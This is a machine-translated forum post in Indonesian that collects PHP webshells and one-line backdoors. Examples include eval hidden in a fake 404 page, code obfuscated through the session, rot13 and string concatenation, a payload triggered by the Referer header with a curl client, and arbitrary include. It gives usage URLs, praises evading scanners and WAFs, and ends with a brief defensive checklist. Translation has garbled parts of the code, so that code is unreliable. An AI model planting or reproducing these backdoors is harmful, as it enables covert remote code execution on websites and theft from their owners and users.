Artikel ini adalah artikel cermin dari terjemahan mesin, silakan klik di sini untuk melompat ke artikel aslinya.

Melihat: 7260|Jawab: 0

[Komunikasi Aman] Sortir backdoor PHP yang kuat itu

[Salin tautan]
Diposting pada 01/12/2014 21.41.13 | | |
Kami memperlakukan program pintu belakang PHP ini dengan mentalitas belajar, dan banyak kode pintu belakang PHP memungkinkan kami untuk melihat seberapa baik pemrogram.
Backdoor PHP yang kuat dalam satu kalimat
Backdoor semacam ini memungkinkan situs web,Administrator server sangat merepotkan dan sering harus mengubah metode untuk melakukan berbagai deteksi, dan banyak teknik penulisan baru tidak dapat ditemukan dan ditangani dengan metode deteksi biasa.
Hari ini kita akan menghitung beberapa Trojan PHP yang menarik.
1. Sembunyikan kuda poni PHP menggunakan halaman 404:
[mw_shl_code=php,benar] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Tidak Ditemukan</title>
</head><body>
<h1>Tidak Ditemukan</h1>
URL <p>yang diminta tidak ditemukan di server ini.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Tidak Ditemukan');
?>[/mw_shl_code]
404 page adalah file yang umum digunakan di situs web, dan hanya sedikit orang yang akan memeriksa dan memodifikasinya setelah direkomendasikan secara umum, sehingga kami dapat menggunakannya untuk menyembunyikan pintu belakang.

2. PHP tersembunyi tanpa fitur dalam satu kalimat:
[mw_shl_code=php,true]<?php
session_start();
$_POST['kode'] && $_SESSION['kode'] = trim($_POST['kode']);
$_SESSION['The Code']&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Tetapkan $_POST['code'] ke $_SESSION['theCode'], lalu jalankan $_SESSION['theCode'], dengan sorotan bahwa tidak ada kode tanda tangan.
Jika Anda menggunakan alat pemindaian untuk memeriksa kode, itu tidak akan alarm dan mencapai tujuan.

3. Pintu Belakang PHP Super Tersembunyi:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Fungsi GET saja merupakan Trojan;
Cara menggunakan:
[mw_shl_code=php,benar]        
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Setelah eksekusi, direktori saat ini menghasilkan c.php Trojan kalimat, ketika parameter A adalah eval, pembuatan Trojan kesalahan gagal, dan ketika ditegaskan, itu juga akan melaporkan kesalahan, tetapi akan menghasilkan Trojan horse, yang tidak dapat diremehkan.
Permintaan level, kode untuk menjalankan backdoor PHP:
Metode ini diimplementasikan dengan dua file, file 1
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; charset = utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", meledak(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokumen 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; charset = utf-8′);
//要执行的代码
$code= <<<KODE
phpinfo();
KODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= array(
CURLOPT_URL => $url,
CURLOPT_HEADER => SALAH,
CURLOPT_RETURNTRANSFER => BENAR,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Jalankan kode yang dikodekan base64 melalui HTTP_REFERER dalam permintaan HTTP untuk mencapai efek backdoor.
Ada baiknya menggunakan ide ini untuk melewati waf.
4.PHP alat generator pintu belakang tenun
weevely adalah yang spesifik PHPPerangkat lunak bebas Webshell, dapat digunakan untuk mensimulasikan cangkang koneksi yang mirip dengan telnet, Weevely biasanya digunakan untuk eksploitasi program web, menyembunyikan pintu belakang atau menggunakan metode seperti telnet alih-alih manajemen berbasis halaman web, kode PHP sisi server yang dihasilkan oleh Weevely dikodekan base64, sehingga dapat menipu perangkat lunak antivirus dan IDS arus utama, Setelah Anda mengunggah kode sisi server, Anda biasanya dapat menjalankannya langsung melalui Weevely.
Fungsi yang digunakan di backdoor adalah fungsi pemrosesan string yang biasa digunakan, dan fungsi seperti eval dan sistem yang digunakan sebagai aturan inspeksi tidak akan muncul langsung di kode, sehingga file backdoor dapat melewati pemeriksaan alat pencarian backdoor. Pemindaian dengan alat deteksi backdoor web grup gelap menunjukkan bahwa file tersebut tidak terancam.
Di atas adalah pengantar umum, dan metode penggunaan yang relevan tidak diperkenalkan di sini, mempopulerkan sains sederhana.
4. Tiga Trojan PHP satu kalimat cacat
      Yang pertama:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Yang kedua
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Tulis kata sandi http://site/2.php?_=assert&__=eval($_POST['pass']) di pisau dapur adalah pass.
Jika Anda menggunakan data tambahan pisau dapur, itu lebih tersembunyi, atau Anda dapat menggunakan alat injeksi lain, karena sudah dikirimkan pasca.
Yang ketiga
[mw_shl_code=php,benar] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'tambahkan'); [/mw_shl_code]
str_rot13 ('riny') adalah eval yang dikodekan, yang benar-benar menghindari kata kunci tanpa kehilangan efeknya, membuat orang muntah darah!
5. Terakhir, buat daftar beberapa pintu belakang Trojan PHP canggih:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Akses"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
termasuk($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Akses"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Singkatnya, backdoor PHP ini bisa digambarkan lengkap, jika Anda tidak berhati-hati, Anda pasti akan tertipu, dan apa yang menjadi prioritas utama artikel kami hari ini? Poin-poin kuncinya ada dalam ringkasan di bawah ini!
Cara menangani pintu belakang satu kalimat PHP:
Kami menekankan beberapa poin penting, dan jika Anda membaca artikel ini, saya yakin Anda bukan orang awam, jadi saya tidak akan bertele-tele:
  • Waspadai keamanan saat menulis program PHP
  • File log server harus sering dibaca dan sering dicadangkan
  • Penetapan izin yang ketat untuk setiap situs
  • Tinjauan keamanan batch yang sering dilakukan untuk file dan direktori dinamis
  • Pelajari cara melakukan anti-virus manual "Investigasi dan Pembunuhan Penghakiman Perilaku"
  • Nantikan, atau menyusup ke kamp keamanan siber yang aktif
  • Bahkan fungsi dapat digunakan sebagai aturan untuk pemrosesan hierarkis lingkungan server
Kami percaya bahwa ketika ada lebih banyak situs untuk dikelola dan sejumlah besar data, kami harus menerapkan beberapa alat tambahan, tetapi kami tidak boleh sepenuhnya mengandalkan alat ini, teknologi selalu diperbarui dan ditingkatkan, yang paling penting adalah Anda harus belajar dan memahami pemikiran menulis orang-orang pintu belakang yang kuat ini, dan transposisi peran dapat memberi Anda kemajuan yang lebih besar.





Mantan:Plugin Firefox Plugin Peretasan Firefox mengubah Firefox menjadi alat peretasan dengan tujuh plugin
Depan:MS12-020 3389 0day exp Kode Eksekusi Desktop Jarak Jauh kode sumber python
Sanggahan:
Semua perangkat lunak, materi pemrograman, atau artikel yang diterbitkan oleh Code Farmer Network hanya untuk tujuan pembelajaran dan penelitian; Konten di atas tidak boleh digunakan untuk tujuan komersial atau ilegal, jika tidak, pengguna akan menanggung semua konsekuensi. Informasi di situs ini berasal dari Internet, dan sengketa hak cipta tidak ada hubungannya dengan situs ini. Anda harus sepenuhnya menghapus konten di atas dari komputer Anda dalam waktu 24 jam setelah pengunduhan. Jika Anda menyukai program ini, harap dukung perangkat lunak asli, pembelian pendaftaran, dan dapatkan layanan asli yang lebih baik. Jika ada pelanggaran, silakan hubungi kami melalui email.

Mail To:help@itsvse.com